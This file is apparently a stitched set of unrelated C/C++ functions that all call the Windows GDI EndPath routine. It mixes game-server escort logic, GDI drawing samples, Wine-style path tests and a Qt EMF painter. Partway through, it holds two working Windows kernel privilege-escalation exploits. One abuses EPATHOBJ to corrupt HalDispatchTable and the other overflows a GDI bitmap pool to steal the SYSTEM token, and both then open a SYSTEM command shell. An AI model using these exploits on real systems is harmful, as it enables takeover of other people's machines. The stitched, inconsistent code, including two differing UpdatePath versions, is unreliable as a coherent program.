void SmartAI::UpdatePath(const uint32 diff)
{
if (!HasEscortState(SMART_ESCORT_ESCORTING))
return;
if (mEscortInvokerCheckTimer < diff)
{
if (!IsEscortInvokerInRange())
{
StopPath(mDespawnTime, mEscortQuestID, true);
}
mEscortInvokerCheckTimer = 1000;
} else mEscortInvokerCheckTimer -= diff;
// handle pause
if (HasEscortState(SMART_ESCORT_PAUSED))
{
if (mWPPauseTimer < diff)
{
if (!me->isInCombat() && !HasEscortState(SMART_ESCORT_RETURNING) && (mWPReached || mLastWPIDReached == SMART_ESCORT_LAST_OOC_POINT || mForcedPaused))
{
GetScript()->ProcessEventsFor(SMART_EVENT_WAYPOINT_RESUMED, NULL, mLastWP->id, GetScript()->GetPathId());
RemoveEscortState(SMART_ESCORT_PAUSED);
if (mForcedPaused)// if paused between 2 wps resend movement
{
ResumePath();
mWPReached = false;
mForcedPaused = false;
}
if (mLastWPIDReached == SMART_ESCORT_LAST_OOC_POINT)
mWPReached = true;
}
mWPPauseTimer = 0;
} else {
mWPPauseTimer -= diff;
}
}
if (HasEscortState(SMART_ESCORT_RETURNING))
{
if (mWPReached)//reached OOC WP
{
RemoveEscortState(SMART_ESCORT_RETURNING);
if (!HasEscortState(SMART_ESCORT_PAUSED))
ResumePath();
mWPReached = false;
}
}
if (me->isInCombat() || HasEscortState(SMART_ESCORT_PAUSED | SMART_ESCORT_RETURNING))
return;
// handle next wp
if (mWPReached)//reached WP
{
mWPReached = false;
if (mCurrentWPID == GetWPCount())
{
EndPath();
} else {
WayPoint* wp = GetNextWayPoint();
if (wp)
{
SetRun(mRun);
me->GetMotionMaster()->MovePoint(wp->id, wp->x, wp->y, wp->z);
}
}
}
}
LRESULT CALLBACK MainWndProc(HWND hWnd, UINT msg, WPARAM wParam,
LPARAM lParam)
{
switch (msg)
{
case WM_CREATE:
{
INITCOMMONCONTROLSEX icx;
icx.dwSize = sizeof(INITCOMMONCONTROLSEX);
icx.dwICC = ICC_BAR_CLASSES;
InitCommonControlsEx(&icx);
hTrackBar =
CreateWindow(
TRACKBAR_CLASS, "",
TBS_HORZ | TBS_BOTH | TBS_AUTOTICKS |
TBS_FIXEDLENGTH | TBS_ENABLESELRANGE |
WS_CHILD | WS_VISIBLE,
10, 260, 375, 40,
hWnd, NULL, hInst, NULL
);
assert(hTrackBar != NULL);
SNDMSG(hTrackBar, TBM_SETTHUMBLENGTH, 20, 0);
SNDMSG(hTrackBar, TBM_SETRANGEMAX, TRUE, 100);
// create the TrueType (scalable) font
HDC hDC = GetDC(hWnd);
try
{
// see Chapter 4 for the definition of MakeFont
hTTFont = font::MakeFont(hDC, "Impact", 72);
if (!hTTFont) throw;
}
catch (...)
{
ReleaseDC(hWnd, hDC);
}
ReleaseDC(hWnd, hDC);
break;
}
case WM_HSCROLL:
{
if (reinterpret_cast<HWND>(lParam) == hTrackBar)
{
//
// adjust the scaling factor according to
// the position of the trackbar's slider
//
scale = static_cast<double>(
(SNDMSG(hTrackBar, TBM_GETPOS, 0, 0) + 1) / 50.0
);
InvalidateRect(hWnd, NULL, true);
}
break;
}
case WM_ERASEBKGND:
{
LRESULT res = DefWindowProc(hWnd, msg, wParam, lParam);
HDC hDC = reinterpret_cast<HDC>(wParam);
HFONT hOldFont = static_cast<HFONT>(
SelectObject(hDC, hTTFont)
);
try
{
SetBkMode(hDC, TRANSPARENT);
// open a path bracket
if (!BeginPath(hDC)) throw;
// record the text to the path
TextOut(hDC, 10, 10, pText, lstrlen(pText));
// close the path bracket and
// select the path into hDC
EndPath(hDC);
// determine the number of endpoints in the path
const int num_points = GetPath(hDC, NULL, NULL, 0);
if (num_points > 0)
{
// make room for the POINTs and vertex types
POINT* pPEnds = new POINT[num_points];
unsigned char* pTypes = new unsigned char[num_points];
try
{
// get the path's description
int num_got = GetPath(hDC, pPEnds, pTypes, num_points);
if (num_got > 0)
{
// start a new path bracket
if (!BeginPath(hDC)) throw;
// scale each point in the description
int iPoint;
for (iPoint = 0; iPoint < num_got; ++iPoint)
{
pPEnds[iPoint].x = static_cast<LONG>(
scale * pPEnds[iPoint].x + 0.5
);
pPEnds[iPoint].y = static_cast<LONG>(
scale * pPEnds[iPoint].y + 0.5
);
}
for (iPoint = 0; iPoint < num_points; ++iPoint)
{
// handle the MoveToEx case
if (pTypes[iPoint] == PT_MOVETO)
{
MoveToEx(
hDC, pPEnds[iPoint].x, pPEnds[iPoint].y, NULL
);
}
// handle the LineTo case
else if (
pTypes[iPoint] == PT_LINETO ||
pTypes[iPoint] == (PT_LINETO | PT_CLOSEFIGURE)
)
{
LineTo(hDC, pPEnds[iPoint].x, pPEnds[iPoint].y);
}
// handle the PolyBezierTo case
else if (
pTypes[iPoint] == PT_BEZIERTO ||
pTypes[iPoint] == (PT_BEZIERTO | PT_CLOSEFIGURE)
)
{
PolyBezierTo(hDC, pPEnds + iPoint, 3);
iPoint += 2;
}
}
// close the new path bracket
EndPath(hDC);
// stroke and fill the new path
StrokeAndFillPath(hDC);
}
}
catch (...)
{
// clean up
delete [] pTypes;
delete [] pPEnds;
throw;
}
// clean up
delete [] pTypes;
delete [] pPEnds;
}
// ...
}
catch (...)
{
SelectObject(hDC, hOldFont);
}
SelectObject(hDC, hOldFont);
return res;
}
case WM_SIZE:
{
MoveWindow(
hTrackBar,
0, HIWORD(lParam) - 40, LOWORD(lParam), 40,
false
);
break;
}
case WM_DESTROY:
{
// clean up
DeleteObject(hTTFont);
PostQuitMessage(0);
break;
}
}
return DefWindowProc(hWnd, msg, wParam, lParam);
}
void SmartAI::JustDied(Unit* killer)
{
GetScript()->ProcessEventsFor(SMART_EVENT_DEATH, killer);
if (HasEscortState(SMART_ESCORT_ESCORTING))
EndPath(true);
}
void GdiContext2D::closePath()
{
Check();
CloseFigure(m_hDC);
EndPath(m_hDC);
}
void SmartAI::UpdatePath(const uint32 diff)
{
if (!HasEscortState(SMART_ESCORT_ESCORTING))
return;
if (mEscortInvokerCheckTimer < diff)
{
// Xinef: Escort failed - no players in range
// Xinef: Despawn immediately
if (!IsEscortInvokerInRange())
{
StopPath(0, mEscortQuestID, true);
// Xinef: allow to properly hook out of range despawn action, which in most cases should perform the same operation as dying
GetScript()->ProcessEventsFor(SMART_EVENT_DEATH, me);
me->DespawnOrUnsummon(1);
return;
}
mEscortInvokerCheckTimer = 1000;
}
else
mEscortInvokerCheckTimer -= diff;
// handle pause
if (HasEscortState(SMART_ESCORT_PAUSED))
{
if (mWPPauseTimer < diff)
{
if (!me->IsInCombat() && !HasEscortState(SMART_ESCORT_RETURNING) && (mWPReached || mForcedPaused))
{
GetScript()->ProcessEventsFor(SMART_EVENT_WAYPOINT_RESUMED, NULL, mCurrentWPID, GetScript()->GetPathId());
RemoveEscortState(SMART_ESCORT_PAUSED);
if (mForcedPaused)// if paused between 2 wps resend movement
{
mWPReached = false;
mForcedPaused = false;
ResumePath();
}
mWPPauseTimer = 0;
}
}
else
mWPPauseTimer -= diff;
}
if (HasEscortState(SMART_ESCORT_RETURNING))
{
if (mOOCReached)//reached OOC WP
{
mOOCReached = false;
RemoveEscortState(SMART_ESCORT_RETURNING);
if (!HasEscortState(SMART_ESCORT_PAUSED))
ResumePath();
}
}
if ((me->GetVictim() && me->IsInCombat()) || HasEscortState(SMART_ESCORT_PAUSED | SMART_ESCORT_RETURNING))
return;
// handle next wp
if (!me->HasUnitState(UNIT_STATE_NOT_MOVE) && me->movespline->Finalized())//reached WP
{
if (!mWPReached)
{
ResumePath();
return;
}
mWPReached = false;
if (mCurrentWPID == GetWPCount())
EndPath();
else if (GetNextWayPoint())
{
SetRun(mRun);
// xinef: if we have reached waypoint, and there is no working spline movement it means our splitted array has ended, make new one
if (me->movespline->Finalized())
ResumePath();
}
}
}
//
// InitWindowRegion
//
// We display the video in a window that has a region selected into it that
// matches the word we are passed in. By doing this we let Windows manage
// all the clipping and mouse technology. The trick is in creating a region
// that matches the word, which is done by using paths. We create a path for
// a temporary HDC, draw the word and then end the path. After that, we can then
// ask Windows for a region that describes that path. That gives us a region
// for the outside of the word, so we bitwise "not" it to get the word region.
//
HRESULT CVideoText::InitWindowRegion(TCHAR *pStringName)
{
ASSERT(pStringName);
OSVERSIONINFO VersionInfo;
VersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
EXECUTE_ASSERT(GetVersionEx(&VersionInfo));
// Set a window region according to the OS capabilities
if ((VersionInfo.dwPlatformId & VER_PLATFORM_WIN32_NT) == 0)
{
m_Size.cx = 320;
m_Size.cy = 240;
return NOERROR;
}
// Get the text extents the word passed in will require based on the
// font and bitmap selected in the current device context. For it to
// be displayed in a different font it must be selected into the HDC
HDC hdc = CreateCompatibleDC(m_hdc);
HFONT hFont = CreateVideoFont();
SelectObject(hdc,hFont);
GetTextExtentPoint32((HDC) hdc, // The output device context
pStringName, // The string we'll be using
lstrlen(pStringName), // Number of characters in it
(LPSIZE) &m_Size); // Filled in with the extents
// Create a bitmap that matches the current format
HBITMAP hMaskBitmap = CreateCompatibleBitmap(hdc,m_Size.cx,m_Size.cy);
if (hMaskBitmap == NULL) {
ASSERT(hMaskBitmap);
return E_UNEXPECTED;
}
// Select the monochrome bitmap into the device context
HBITMAP hBitmap = (HBITMAP) SelectObject(hdc,hMaskBitmap);
EXECUTE_ASSERT(BeginPath(hdc));
// Draw the string into the monochrome bitmap
ExtTextOut((HDC) hdc, // Target device context
(int) 0, // x coordinate reference
(int) 0, // Likewise y coordinate
(DWORD) 0, // No special flags to set
NULL, // No clipping rectangle
pStringName, // Pointer to text words
lstrlen(pStringName), // Number of characters
NULL); // Intercharacter spacing
EXECUTE_ASSERT(EndPath(hdc));
HRGN hOutside = PathToRegion(hdc);
HRGN hFullWindow = CreateRectRgn(0,0,m_Size.cx,m_Size.cy);
HRGN hWordRegion = CreateRectRgn(0,0,1,1);
CombineRgn(hWordRegion,hFullWindow,hOutside,RGN_DIFF);
SetWindowRgn(m_hwnd,hWordRegion,TRUE);
// Clear up the regions we created
DeleteObject(hWordRegion);
DeleteObject(hOutside);
DeleteObject(hFullWindow);
// Delete the HDC and text bitmap
SelectObject(hdc,hBitmap);
HFONT hDefault = (HFONT) GetStockObject(SYSTEM_FONT);
SelectObject(hdc,hDefault);
DeleteObject(hFont);
DeleteObject(hMaskBitmap);
DeleteDC(hdc);
return NOERROR;
} // InitWindowRegion
HRGN DrawChromeFrame(HDC hdc, RECT *pRect, COLORREF clrBorder, COLORREF clrBack)
{
HBRUSH hBackBrush = NULL;
HBRUSH hBorderBrush;
HRGN hRgn;
hBorderBrush = CreateSolidBrush(clrBorder);
hBackBrush = CreateSolidBrush (clrBack);
POINT lpts[4], rpts[4];
int spread, eigth, sixth, quarter;
int width = pRect->right - pRect->left;
int height = pRect->bottom - pRect->top;
if (1){//bottom
spread = ((float)height) * 2/3;
eigth = ((float)height) * 1/8;
sixth = ((float)height) * 1/6;
quarter = ((float)height) * 1/4;
}else{
spread = ((float)width) * 2/3;
eigth = ((float)width) * 1/8;
sixth = ((float)width) * 1/6;
quarter = ((float)width) * 1/4;
}
pRect->right += spread;
lpts[3].x = pRect->left; lpts[3].y = pRect->bottom;
lpts[2].x = pRect->left + sixth; lpts[2].y = pRect->bottom - eigth;
lpts[1].x = pRect->left + spread - quarter; lpts[1].y = pRect->top + eigth;
lpts[0].x = pRect->left + spread; lpts[0].y = pRect->top;
rpts[3].x = pRect->right - spread; rpts[3].y = pRect->top;
rpts[2].x = pRect->right - spread + quarter; rpts[2].y = pRect->top + eigth;
rpts[1].x = pRect->right - sixth; rpts[1].y = pRect->bottom - eigth;
rpts[0].x = pRect->right; rpts[0].y = pRect->bottom;
MoveToEx(hdc, lpts[3].x, lpts[3].y, NULL);
BeginPath(hdc);
PolyBezier(hdc, lpts, sizeof(lpts)/sizeof(POINT));
//MoveToEx(hdc, lpts[0].x, lpts[0].y, NULL);
LineTo(hdc, rpts[3].x, rpts[3].y);
PolyBezier(hdc, rpts, sizeof(rpts)/sizeof(POINT));
//MoveToEx(hdc, rpts[0].x, rpts[0].y, NULL);
LineTo(hdc, lpts[3].x, lpts[3].y);
CloseFigure(hdc);
EndPath(hdc);
//StrokePath (hdc);
FlattenPath(hdc);
hRgn = PathToRegion(hdc);
FillRgn(hdc, hRgn, hBackBrush);
FrameRgn(hdc, hRgn, hBorderBrush, 1, 1);
DeleteObject(hBorderBrush);
DeleteObject(hBackBrush);
HGDIOBJ hPen = NULL;
HGDIOBJ hOldPen;
hPen = CreatePen(PS_SOLID, 2, clrBack);
hOldPen = SelectObject(hdc, hPen);
DrawLine(hdc, rpts[0].x, rpts[0].y,
lpts[3].x, lpts[3].y);
SelectObject(hdc, hOldPen);
DeleteObject(hPen);
pRect->left += spread;
pRect->right -= spread;
return hRgn;
}
static void test_widenpath(void)
{
HDC hdc = GetDC(0);
HPEN greenPen, narrowPen;
POINT pnt[6];
INT nSize, ret;
/* Create a pen to be used in WidenPath */
greenPen = CreatePen(PS_SOLID, 10, RGB(0,0,0));
SelectObject(hdc, greenPen);
/* Prepare a path */
pnt[0].x = 100;
pnt[0].y = 0;
pnt[1].x = 200;
pnt[1].y = 0;
pnt[2].x = 300;
pnt[2].y = 100;
pnt[3].x = 300;
pnt[3].y = 200;
pnt[4].x = 200;
pnt[4].y = 300;
pnt[5].x = 100;
pnt[5].y = 300;
/* Set a polyline path */
BeginPath(hdc);
Polyline(hdc, pnt, 6);
EndPath(hdc);
/* Widen the polyline path */
ok(WidenPath(hdc), "WidenPath fails while widening a poyline path.\n");
/* Test if WidenPath seems to have done his job */
nSize = GetPath(hdc, NULL, NULL, 0);
ok(nSize != -1, "GetPath fails after calling WidenPath.\n");
ok(nSize > 6, "Path number of points is too low. Should be more than 6 but is %d\n", nSize);
AbortPath(hdc);
/* Test WidenPath with an open path (last error only set on Win2k and later) */
SetLastError(0xdeadbeef);
BeginPath(hdc);
ret = WidenPath(hdc);
ok(ret == FALSE && (GetLastError() == ERROR_CAN_NOT_COMPLETE || GetLastError() == 0xdeadbeef),
"WidenPath fails while widening an open path. Return value is %d, should be %d. Error is %u\n", ret, FALSE, GetLastError());
AbortPath(hdc);
/* Test when the pen width is equal to 1. The path should change too */
narrowPen = CreatePen(PS_SOLID, 1, RGB(0,0,0));
SelectObject(hdc, narrowPen);
BeginPath(hdc);
Polyline(hdc, pnt, 6);
EndPath(hdc);
ret = WidenPath(hdc);
nSize = GetPath(hdc, NULL, NULL, 0);
ok(nSize > 6, "WidenPath should compute a widdened path with a 1px wide pen. Path length is %d, should be more than 6\n", nSize);
ReleaseDC(0, hdc);
return;
}
static void dw_gt_end_path(vd_trace_interface *I)
{ get_window();
if (host.tw == NULL)
return;
EndPath(I->host->hdc);
}
int main(int argc, char **argv)
{
HANDLE Thread;
HDC Device;
ULONG Size;
ULONG PointNum;
HMODULE KernelHandle;
PULONG DispatchRedirect;
PULONG Interval;
ULONG SavedInterval;
RTL_PROCESS_MODULES ModuleInfo;
LogMessage(L_INFO, "\r--------------------------------------------------\n"
"\rWindows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit\n"
"\r------------------- taviso () cmpxchg8b com, programmeboy () gmail com ---\n"
"\n");
NtQueryIntervalProfile = GetProcAddress(GetModuleHandle("ntdll"), "NtQueryIntervalProfile");
NtQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll"), "NtQuerySystemInformation");
Mutex = CreateMutex(NULL, FALSE, NULL);
DispatchRedirect = (PVOID) HalDispatchRedirect;
Interval = (PULONG) ShellCode;
SavedInterval = Interval[0];
TargetPid = GetCurrentProcessId();
LogMessage(L_INFO, "NtQueryIntervalProfile () %p", NtQueryIntervalProfile);
LogMessage(L_INFO, "NtQuerySystemInformation () %p", NtQuerySystemInformation);
// Lookup the address of system modules.
NtQuerySystemInformation(SystemModuleInformation,
&ModuleInfo,
sizeof ModuleInfo,
NULL);
LogMessage(L_DEBUG, "NtQuerySystemInformation() => %s () %p",
ModuleInfo.Modules[0].FullPathName,
ModuleInfo.Modules[0].ImageBase);
// Lookup some system routines we require.
KernelHandle = LoadLibrary(ModuleInfo.Modules[0].FullPathName + ModuleInfo.Modules[0].OffsetToFileName);
HalDispatchTable = (ULONG) GetProcAddress(KernelHandle, "HalDispatchTable") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
PsInitialSystemProcess = (ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
PsReferencePrimaryToken = (ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
PsLookupProcessByProcessId = (ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
// Search for a ret instruction to install in the damaged HalDispatchTable.
HalQuerySystemInformation = (ULONG) memchr(KernelHandle, 0xC3, ModuleInfo.Modules[0].ImageSize)
- (ULONG) KernelHandle
+ (ULONG) ModuleInfo.Modules[0].ImageBase;
LogMessage(L_INFO, "Discovered a ret instruction at %p", HalQuerySystemInformation);
// Create our PATHRECORD in user space we will get added to the EPATHOBJ
// pathrecord chain.
PathRecord = VirtualAlloc(NULL,
sizeof *PathRecord,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
LogMessage(L_INFO, "Allocated userspace PATHRECORD () %p", PathRecord);
// You need the PD_BEZIERS flag to enter EPATHOBJ::pprFlattenRec() from
// EPATHOBJ::bFlatten(). We don't set it so that we can trigger an infinite
// loop in EPATHOBJ::bFlatten().
PathRecord->flags = 0;
PathRecord->next = PathRecord;
PathRecord->prev = (PPATHRECORD)(0x42424242);
LogMessage(L_INFO, " ->next @ %p", PathRecord->next);
LogMessage(L_INFO, " ->prev @ %p", PathRecord->prev);
LogMessage(L_INFO, " ->flags @ %u", PathRecord->flags);
// Now we need to create a PATHRECORD at an address that is also a valid
// x86 instruction, because the pointer will be interpreted as a function.
// I've created a list of candidates in DispatchRedirect.
LogMessage(L_INFO, "Searching for an available stub address...");
// I need to map at least two pages to guarantee the whole structure is
// available.
while (!VirtualAlloc(*DispatchRedirect & ~(PAGE_SIZE - 1),
PAGE_SIZE * 2,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE)) {
LogMessage(L_WARN, "\tVirtualAlloc(%#x) => %#x",
*DispatchRedirect & ~(PAGE_SIZE - 1),
GetLastError());
// This page is not available, try the next candidate.
if (!*++DispatchRedirect) {
LogMessage(L_ERROR, "No redirect candidates left, sorry!");
return 1;
}
}
LogMessage(L_INFO, "Success, ExploitRecordExit () %#0x", *DispatchRedirect);
// This PATHRECORD must terminate the list and recover.
ExploitRecordExit = (PPATHRECORD) *DispatchRedirect;
ExploitRecordExit->next = NULL;
ExploitRecordExit->prev = NULL;
ExploitRecordExit->flags = PD_BEGINSUBPATH;
ExploitRecordExit->count = 0;
LogMessage(L_INFO, " ->next @ %p", ExploitRecordExit->next);
LogMessage(L_INFO, " ->prev @ %p", ExploitRecordExit->prev);
LogMessage(L_INFO, " ->flags @ %u", ExploitRecordExit->flags);
// This is the second stage PATHRECORD, which causes a fresh PATHRECORD
// allocated from newpathrec to nt!HalDispatchTable. The Next pointer will
// be copied over to the new record. Therefore, we get
//
// nt!HalDispatchTable[1] = &ExploitRecordExit.
//
// So we make &ExploitRecordExit a valid sequence of instuctions here.
LogMessage(L_INFO, "ExploitRecord () %#0x", &ExploitRecord);
ExploitRecord.next = (PPATHRECORD) *DispatchRedirect;
ExploitRecord.prev = (PPATHRECORD) &HalDispatchTable[1];
ExploitRecord.flags = PD_BEZIERS | PD_BEGINSUBPATH;
ExploitRecord.count = 4;
LogMessage(L_INFO, " ->next @ %p", ExploitRecord.next);
LogMessage(L_INFO, " ->prev @ %p", ExploitRecord.prev);
LogMessage(L_INFO, " ->flags @ %u", ExploitRecord.flags);
LogMessage(L_INFO, "Creating complex bezier path with %x", (ULONG)(PathRecord) >> 4);
// Generate a large number of Belier Curves made up of pointers to our
// PATHRECORD object.
for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) {
Points[PointNum].x = (ULONG)(PathRecord) >> 4;
Points[PointNum].y = (ULONG)(PathRecord) >> 4;
PointTypes[PointNum] = PT_BEZIERTO;
}
// Switch to a dedicated desktop so we don't spam the visible desktop with
// our Lines (Not required, just stops the screen from redrawing slowly).
SetThreadDesktop(CreateDesktop("DontPanic",
NULL,
NULL,
0,
GENERIC_ALL,
NULL));
// Get a handle to this Desktop.
Device = GetDC(NULL);
// Take ownership of Mutex
WaitForSingleObject(Mutex, INFINITE);
// Spawn a thread to cleanup
Thread = CreateThread(NULL, 0, WatchdogThread, NULL, 0, NULL);
LogMessage(L_INFO, "Begin CreateRoundRectRgn cycle");
// We need to cause a specific AllocObject() to fail to trigger the
// exploitable condition. To do this, I create a large number of rounded
// rectangular regions until they start failing. I don't think it matters
// what you use to exhaust paged memory, there is probably a better way.
//
// I don't use the simpler CreateRectRgn() because it leaks a GDI handle on
// failure. Seriously, do some damn QA Microsoft, wtf.
for (Size = 1 << 26; Size; Size >>= 1) {
while (Regions[NumRegion] = CreateRoundRectRgn(0, 0, 1, Size, 1, 1))
NumRegion++;
}
LogMessage(L_INFO, "Allocated %u HRGN objects", NumRegion);
LogMessage(L_INFO, "Flattening curves...");
for (PointNum = MAX_POLYPOINTS; PointNum && !Finished; PointNum -= 3) {
BeginPath(Device);
PolyDraw(Device, Points, PointTypes, PointNum);
EndPath(Device);
FlattenPath(Device);
FlattenPath(Device);
// Test if exploitation succeeded.
NtQueryIntervalProfile(ProfileTotalIssues, Interval);
// Repair any damage.
*Interval = SavedInterval;
EndPath(Device);
}
if (Finished) {
LogMessage(L_INFO, "Success, launching shell...", Finished);
ShellExecute(NULL, "open", "cmd", NULL, NULL, SW_SHOW);
LogMessage(L_INFO, "Press any key to exit...");
getchar();
ExitProcess(0);
}
// If we reach here, we didn't trigger the condition. Let the other thread know.
ReleaseMutex(Mutex);
WaitForSingleObject(Thread, INFINITE);
ReleaseDC(NULL, Device);
// Try again...
LogMessage(L_ERROR, "No luck, run exploit again (it can take several attempts)");
LogMessage(L_INFO, "Press any key to exit...");
getchar();
ExitProcess(1);
}
void main(int argc, char* argv[]) {
HDC hdc = GetDC(NULL);
HDC hMemDC = CreateCompatibleDC(hdc);
HGDIOBJ bitmap = CreateBitmap(0x5a, 0x1f, 1, 32, NULL);
HGDIOBJ bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap);
static POINT points[0x3fe01];
for (int l = 0; l < 0x3FE00; l++) {
points[l].x = 0x5a1f;
points[l].y = 0x5a1f;
}
points[2].y = 20;
points[0x3FE00].x = 0x4a1f;
points[0x3FE00].y = 0x6a1f;
if (!BeginPath(hMemDC)) {
fprintf(stderr, "[!] BeginPath() Failed: %x\r\n", GetLastError());
}
for (int j = 0; j < 0x156; j++) {
if (j > 0x1F && points[2].y != 0x5a1f) {
points[2].y = 0x5a1f;
}
if (!PolylineTo(hMemDC, points, 0x3FE01)) {
fprintf(stderr, "[!] PolylineTo() Failed: %x\r\n", GetLastError());
}
}
EndPath(hMemDC);
//Kernel Pool Fung=Shuei
fungshuei();
//getchar();
fprintf(stdout, "[+] Trigerring Exploit.\r\n");
if (!FillPath(hMemDC)) {
fprintf(stderr, "[!] FillPath() Failed: %x\r\n", GetLastError());
}
printf("%s\r\n", "Done filling.");
HRESULT res;
VOID *fake = VirtualAlloc(0x0000000100000000, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!fake) {
fprintf(stderr, "VirtualAllocFailed. %x\r\n", GetLastError());
}
memset(fake, 0x1, 0x100);
bits = malloc(0x1000);
memset(bits, 0x42, 0x1000);
for (int k=0; k < 5000; k++) {
res = GetBitmapBits(bitmaps[k], 0x1000, bits); //1685 * 2 * 1 + 1
if (res > 0x150) {
fprintf(stdout, "GetBitmapBits Result. %x\r\nindex: %d\r\n", res, k);
hManager = bitmaps[k];
hWorker = bitmaps[k + 1];
// Get Gh05 header to fix overflown header.
static BYTE Gh04[0x9];
fprintf(stdout, "\r\nGh04 header:\r\n");
for (int i = 0; i < 0x10; i++){
Gh04[i] = bits[0x1d0 + i];
fprintf(stdout, "%02x", bits[0x1d0 + i]);
}
// Get Gh05 header to fix overflown header.
static BYTE Gh05[0x9];
fprintf(stdout, "\r\nGh05 header:\r\n");
for (int i = 0; i < 0x10; i++) {
Gh05[i] = bits[0xd90 + i];
fprintf(stdout, "%02x", bits[0xd90 + i]);
}
// Address of Overflown Gh04 object header
static BYTE addr1[0x7];
fprintf(stdout, "\r\nPrevious page Gh04 (Leaked address):\r\n");
for (int j = 0; j < 0x8; j++) {
addr1[j] = bits[0x210 + j];
fprintf(stdout, "%02x", bits[0x210 + j]);
}
//Get pvscan0 address of second Gh05 object
static BYTE* pvscan[0x07];
fprintf(stdout, "\r\nPvsca0:\r\n");
for (int i = 0; i < 0x8; i++) {
pvscan[i] = bits[0xdf0 + i];
fprintf(stdout, "%02x", bits[0xdf0 + i]);
}
// Calculate address to overflown Gh04 object header.
addr1[0x0] = 0;
int u = addr1[0x1];
u = u - 0x10;
addr1[1] = u;
//Fix overflown Gh04 object Header
SetAddress(addr1);
WriteToAddress(Gh04);
// Calculate address to overflown Gh05 object header.
addr1[0] = 0xc0;
int y = addr1[1];
y = y + 0xb;
addr1[1] = y;
//Fix overflown Gh05 object Header
SetAddress(addr1);
WriteToAddress(Gh05);
// get System EPROCESS
ULONG64 SystemEPROCESS = PsInitialSystemProcess();
//fprintf(stdout, "\r\n%x\r\n", SystemEPROCESS);
ULONG64 CurrentEPROCESS = PsGetCurrentProcess();
//fprintf(stdout, "\r\n%x\r\n", CurrentEPROCESS);
ULONG64 SystemToken = 0;
// read token from system process
ReadFromAddress(SystemEPROCESS + gConfig.TokenOffset, (BYTE *)&SystemToken, 0x8);
// write token to current process
ULONG64 CurProccessAddr = CurrentEPROCESS + gConfig.TokenOffset;
SetAddress((BYTE *)&CurProccessAddr);
WriteToAddress((BYTE *)&SystemToken);
// Done and done. We're System :)
system("cmd.exe");
break;
}
if (res == 0) {
fprintf(stderr, "GetBitmapBits failed. %x\r\n", GetLastError());
}
}
getchar();
//clean up
DeleteObject(bitobj);
DeleteObject(bitmap);
DeleteDC(hMemDC);
ReleaseDC(NULL, hdc);
VirtualFree(0x0000000100000000, 0x100, MEM_RELEASE);
//free(points);
}
void EmfPaintEngine::drawPath ( const QPainterPath & path )
{
setClipping();
int points = path.elementCount();
POINT *pts = new POINT[points];
BYTE *types = new BYTE[points];
POINT *bzs = new POINT[3];
int bez = 0;
BeginPath(metaDC);
QMatrix m = painter()->worldMatrix();
for (int i = 0; i < points; i++){
QPainterPath::Element el = path.elementAt(i);
QPointF p = m.map(QPointF(el.x, el.y));
int x = qRound(p.x());
int y = qRound(p.y());
pts[i].x = x;
pts[i].y = y;
switch(el.type){
case QPainterPath::MoveToElement:
types[i] = PT_MOVETO;
#ifndef Q_WS_WIN
MoveToEx (metaDC, x, y, 0);
#endif
break;
case QPainterPath::LineToElement:
types[i] = PT_LINETO;
#ifndef Q_WS_WIN
LineTo(metaDC, x, y);
#endif
break;
case QPainterPath::CurveToElement:
types[i] = PT_BEZIERTO;
#ifndef Q_WS_WIN
bzs[bez] = pts[i];
bez++;
#endif
break;
case QPainterPath::CurveToDataElement:
types[i] = PT_BEZIERTO;
#ifndef Q_WS_WIN
bzs[bez] = pts[i];
if (bez == 2){
PolyBezierTo(metaDC, bzs, 3);
bez = 0;
} else
bez++;
#endif
break;
}
}
HPEN wpen = convertPen(painter()->pen());
SelectObject(metaDC, wpen);
#ifdef Q_WS_WIN
PolyDraw(metaDC, pts, types, points);
#else
StrokePath(metaDC);
#endif
HBRUSH wbrush = convertBrush(painter()->brush());
SelectObject(metaDC, wbrush);
EndPath(metaDC);
if(QPoint(pts[0].x, pts[0].y) == QPoint(pts[points - 1].x, pts[points - 1].y))
StrokeAndFillPath(metaDC);
else {
FillPath(metaDC);
#ifdef Q_WS_WIN
PolyDraw(metaDC, pts, types, points);
#else
StrokePath(metaDC);
#endif
}
resetClipping();
DeleteObject(wbrush);
DeleteObject(wpen);
delete [] pts;
delete [] types;
}